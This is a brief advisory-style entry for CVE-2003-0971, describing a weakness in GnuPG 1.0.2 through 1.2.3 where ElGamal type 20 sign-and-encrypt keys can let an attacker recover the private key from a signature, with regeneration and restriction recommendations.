CVE-2003-0971

Name of the Vulnerable Software and Affected Versions GnuPG versions 1.0.2 through 1.2.3

Description The issue concerns the creation of ElGamal type 20 keys, which are used for both signing and encryption. In affected versions, the same key component is used for encryption as for signing, allowing attackers to potentially determine the private key from a signature. This could lead to a breach of confidentiality, integrity, and availability of protected information. Exploitation of the issue can be done remotely.

Recommendations For versions 1.0.2 through 1.2.3, consider regenerating keys to ensure the encryption and signing components are distinct, until a fixed version is available. As a temporary workaround, restrict the use of ElGamal type 20 keys for sensitive operations.